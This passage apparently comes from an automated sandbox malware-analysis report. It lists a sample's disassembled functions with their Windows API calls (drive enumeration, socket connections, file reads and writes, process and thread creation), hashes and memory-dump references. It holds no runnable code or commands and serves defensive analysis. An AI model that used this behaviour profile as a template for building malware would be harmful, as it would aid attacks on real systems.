        • Part of subcall function 00205067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00205102
        • Part of subcall function 00205067: connect.WS2_32(00000000,?,00000010), ref: 00205113
        • Part of subcall function 00205067: WSAGetLastError.WS2_32 ref: 0020511D
        • Part of subcall function 00205067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 0020517C
        • Part of subcall function 00205067: recv.WS2_32(?,?,00000001,00000002), ref: 00205195
        • Part of subcall function 00205067: WSAGetLastError.WS2_32 ref: 002051A2
        • Part of subcall function 00205067: getpeername.WS2_32(?,?,?), ref: 002051C9
        • Part of subcall function 00205067: closesocket.WS2_32(?), ref: 002051E3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1223028931-841204015
      • Opcode ID: 3059f49234ff31c5a88d6be2a541e78cf4ce96fc0d79fd39316a806ecb9b1513
      • Instruction ID: b1c192680b6ab5f4719a683cf0773fd7bc8fff404d4260d67e1d5293b52415c6
      • Opcode Fuzzy Hash: 3059f49234ff31c5a88d6be2a541e78cf4ce96fc0d79fd39316a806ecb9b1513
      • Instruction Fuzzy Hash: 8011D071614326AFCB10AF68CC8586BBBA9FF48355F10092AF889C2253D731D964CFE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002032A6 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,0020339F), ref: 002032AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,0020339F), ref: 002032B2
      • CloseHandle.KERNEL32(00000000,?,0020339F), ref: 002032C5
      • CloseHandle.KERNEL32(?,?,0020339F), ref: 002032CF
      • CloseHandle.KERNEL32(?,?,0020339F), ref: 002032D9
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: bf596c8be8ff99fd4fb9114035ca0d1f1683545a13fe608180894cbca606a714
      • Instruction ID: 82f8b198f50b6fcb311408667baef5fb7a2ae01a35f6b93c0977f092f14b8481
      • Opcode Fuzzy Hash: bf596c8be8ff99fd4fb9114035ca0d1f1683545a13fe608180894cbca606a714
      • Instruction Fuzzy Hash: 73F03A322143025FD760AF69EC89A2BB3EEAE94B10355080DF846D3593DB25FD928A61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002033C5 Relevance: 7.5, APIs: 5, Instructions: 18COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,002057AF), ref: 002033CB
      • SetEvent.KERNEL32(?), ref: 002033DE
      • SetEvent.KERNEL32(00000000), ref: 002033E2
      • SetEvent.KERNEL32(?), ref: 002033E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 002033EA
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: fb91e2edd9ceecbb67fd543452836f2b491795f2b3ba0f4507efb2badd151427
      • Instruction ID: 89370b50137a2cee375c5e0ef3b29797486fc5a18bfaf592690b3a9c5ac08c16
      • Opcode Fuzzy Hash: fb91e2edd9ceecbb67fd543452836f2b491795f2b3ba0f4507efb2badd151427
      • Instruction Fuzzy Hash: C9D06776101748EFD6216B66FD8CD4B7BBAEFC83613518818E19741432D732A859DF22
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00201000 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      • GetLogicalDrives.KERNEL32 ref: 00201015
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocDrivesInformationLogicalProcessVolume
      • String ID: X:\$i. $i.
      • API String ID: 2665412759-2231886564
      • Opcode ID: acf675405929594fa5c7fa65909655db0dcbfc84ea0dc71f14845891a2a3a726
      • Instruction ID: 20e2f5a608affe2dcd02e305d952c8e633da492de86da4e763de97a7c7f3bbd8
      • Opcode Fuzzy Hash: acf675405929594fa5c7fa65909655db0dcbfc84ea0dc71f14845891a2a3a726
      • Instruction Fuzzy Hash: 09613E71D2030AAADF15ABA4DD46BAEBBB9AF04710F140069F504B61D3DB719EB0DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020411D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00204147
      • GetProcAddress.KERNEL32(00000000), ref: 0020414E
      • CoGetObject.OLE32(?,?,0020A1F0,?), ref: 002041A1
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $
      • API String ID: 4150452153-3993045852
      • Opcode ID: ef9104891f8354c685059dab962fd27be27e6e68fe9475804ff3d46bfa12987b
      • Instruction ID: 3cc6da38cbe181c9c7d0204bfbfcf59a57aae11db3fe5b362be2d5ddb1a9ba84
      • Opcode Fuzzy Hash: ef9104891f8354c685059dab962fd27be27e6e68fe9475804ff3d46bfa12987b
      • Instruction Fuzzy Hash: 9F415DB1A10319AFDB10DFE0D889AAEBBB9EF44705F108059F905E7292D7319A55CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00201A76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
      Download Yara Rule
      APIs
      • GetLogicalDrives.KERNEL32 ref: 00201A82
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
        • Part of subcall function 00201706: htonl.WS2_32(?), ref: 00201774
        • Part of subcall function 00205840: CreateThread.KERNEL32(00000000,00000000,002056B3,00000000,00000000,00000000), ref: 002058F2
      • CloseHandle.KERNEL32(00000000), ref: 00201B37
      • CloseHandle.KERNEL32(00000000), ref: 00201B6B
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:
      • API String ID: 1738266806-1324186152
      • Opcode ID: ceb8917136dfcabf52c42b694f2a0830f66740702a622410ad5f53a647461564
      • Instruction ID: ee0b3c11fd7a57a10ead0fdbcd97b007bd1af4ead48253efe540fd82853be618
      • Opcode Fuzzy Hash: ceb8917136dfcabf52c42b694f2a0830f66740702a622410ad5f53a647461564
      • Instruction Fuzzy Hash: 2531F072520706ABCB21BF709C46A2FB7A9BF44720F004529F858961D3EB31D970CFA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00201CC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110sleepCOMMON
      Download Yara Rule
      APIs
      • GetLogicalDrives.KERNEL32 ref: 00201CD1
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
      • GetLogicalDrives.KERNEL32 ref: 00201D33
      • Sleep.KERNEL32(000003E8), ref: 00201DC3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :
      • API String ID: 2297414327-2836105686
      • Opcode ID: 2bad3ab60ce667e53c2802a90e77bf17f6790738f12f69e7cbbde910593ebe13
      • Instruction ID: bb0a1d756e00f9f685b85adb20f6c76caa1f279a1fd830bca5044d3d9afa5f98
      • Opcode Fuzzy Hash: 2bad3ab60ce667e53c2802a90e77bf17f6790738f12f69e7cbbde910593ebe13
      • Instruction Fuzzy Hash: A9317E76914706AFC701EF60D88592BBBA9FF84350F400929F854962E3EB71DD748F92
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020489E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76processCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00204908
      • CloseHandle.KERNEL32(?), ref: 0020491E
      • CloseHandle.KERNEL32(?), ref: 00204923
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocCreateFileNameProc
      • String ID: D
      • API String ID: 3648169817-2746444292
      • Opcode ID: db1955a8152a45f59732a00a55883f0703fcf1eef0035d75cda6f39e0aa6c489
      • Instruction ID: 514857a528a4f784b1497b21fa8026961a5426b89808912363ce9be79f40d2fd
      • Opcode Fuzzy Hash: db1955a8152a45f59732a00a55883f0703fcf1eef0035d75cda6f39e0aa6c489
      • Instruction Fuzzy Hash: 9211C8B291031D7FD710ABE4DC4A9DFBF7DEF45720F100026F605A6082D6709A518A91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203969 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,0020A208,00000104,?,i. ,002011AD,?,?), ref: 0020397F
      • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00203996
      • CloseHandle.KERNEL32(00000000), ref: 002039AB
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$CloseCreateHandleWrite
      • String ID: i.
      • API String ID: 1065093856-2284716121
      • Opcode ID: ce519f16b16e542e16f84bdeb33733e0925d05b1209c0682a21801df4d510c09
      • Instruction ID: 8f6d6fdce32783979028282a7eb0ccbee19c173346d65230f0c04c63e634143a
      • Opcode Fuzzy Hash: ce519f16b16e542e16f84bdeb33733e0925d05b1209c0682a21801df4d510c09
      • Instruction Fuzzy Hash: F0F01C72202228BFDB205B66AC4CEEB7E6DEB866B5B404124F909D2191D6709E05D6A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002056B3 Relevance: 6.1, APIs: 4, Instructions: 138synchronizationthreadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 002032FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,002056C4), ref: 0020331E
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203371
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 0020337B
        • Part of subcall function 002032FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203386
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      • CreateThread.KERNEL32(00000000,00000001,002054BF,?,00000000,00000000), ref: 00205746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002057A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 002057B9
      • CloseHandle.KERNEL32(?), ref: 002057CB
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:
      • API String ID: 4076096208-0
      • Opcode ID: 5c2059dcb9a03c8c4fd2e3e243fbcfdbac2ec8a7414d5fff2a5c6e4d43e327dc
      • Instruction ID: c54dc4c04ef5dfd6b1f01c506e40241eaf317657a17cbe225f11ed81e3e50a28
      • Opcode Fuzzy Hash: 5c2059dcb9a03c8c4fd2e3e243fbcfdbac2ec8a7414d5fff2a5c6e4d43e327dc
      • Instruction Fuzzy Hash: 2741E671224712AFD710AF20DCC6E2BB7A8EF44710F100629F951961E3EB61ECB48F91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00208B60 Relevance: 6.1, APIs: 4, Instructions: 87fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00208B7C
      • __aulldiv.LIBCMT ref: 00208BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 00208BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 00208C0E
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:
      • API String ID: 3696392486-0
      • Opcode ID: cddbccd007675233648d3206dba1e3acf06c16f6ec20411f6d95ce2f5791ab0b
      • Instruction ID: e6b7035b98a5ca81909ec41d192b781877d25a0c0623103d86ebe338bd3a6c45
      • Opcode Fuzzy Hash: cddbccd007675233648d3206dba1e3acf06c16f6ec20411f6d95ce2f5791ab0b
      • Instruction Fuzzy Hash: FF317FB1D11329AFDF20CFA5CC84AAFBBB8EB04754F140026F940B2291D7708A51CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203772 Relevance: 6.1, APIs: 4, Instructions: 84memoryfileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 002037A7
      • AllocConsole.KERNEL32 ref: 002037C0
      • GetStdHandle.KERNEL32(000000F5), ref: 002037C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0020381C
        • Part of subcall function 002090A1: GetProcessHeap.KERNEL32(00000000,0020633F,002062A2,00000000,00000010,00000000,00000020,0020633F,00000040,00202A6F,0020B410), ref: 002090A7
        • Part of subcall function 002090A1: HeapFree.KERNEL32(00000000), ref: 002090AE
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocProcess$ConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:
      • API String ID: 1040683013-0
      • Opcode ID: 16a65da650b1452af9600514ef66dd6d7f79b70c13727c6a0198d20204ad312c
      • Instruction ID: aab056ed55d6407195be600fc56d77e650c517d683d02c3bd4fc686715f593cd
      • Opcode Fuzzy Hash: 16a65da650b1452af9600514ef66dd6d7f79b70c13727c6a0198d20204ad312c
      • Instruction Fuzzy Hash: 572166B26203033BE3206F259C89F7B362DAF51731F004234F916A10C3DB648EE18AE2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002086B7 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
      Download Yara Rule
      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 002086EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00208713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208766
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite
      • String ID:
      • API String ID: 539440098-0
      • Opcode ID: fa1b3a1651b0cbda4de4e9d40225617969b755fb31607ad92bf0b7ba3defcea9
      • Instruction ID: ffb9656797a35be99bb391521640cc3a18294543e5519f9265798a4749adc84c
      • Opcode Fuzzy Hash: fa1b3a1651b0cbda4de4e9d40225617969b755fb31607ad92bf0b7ba3defcea9
      • Instruction Fuzzy Hash: B521277991030AABDF109FA5CC80EAFFBF9FB48780F104529E441A21A5EB719A11CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002032FF Relevance: 6.1, APIs: 4, Instructions: 75COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,002056C4), ref: 0020331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 0020337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00203386
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEvent$Heap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID:
      • API String ID: 1287423427-0
      • Opcode ID: 44201dc5f8bac0cf40ab7a3ea29ceba785f81a6869a7bce85bdd45eb36b2835f
      • Instruction ID: e6c62e4cb949a8b71dc1f404e14189453b4237cd2322531f61e955c592ec6d26
      • Opcode Fuzzy Hash: 44201dc5f8bac0cf40ab7a3ea29ceba785f81a6869a7bce85bdd45eb36b2835f
      • Instruction Fuzzy Hash: 35218BB16207019FD730EF6689C5B56F6EDBF44B00F40846EF689975C2CBB0D9808B90
      Uniqueness

      Uniqueness Score: -1.00%

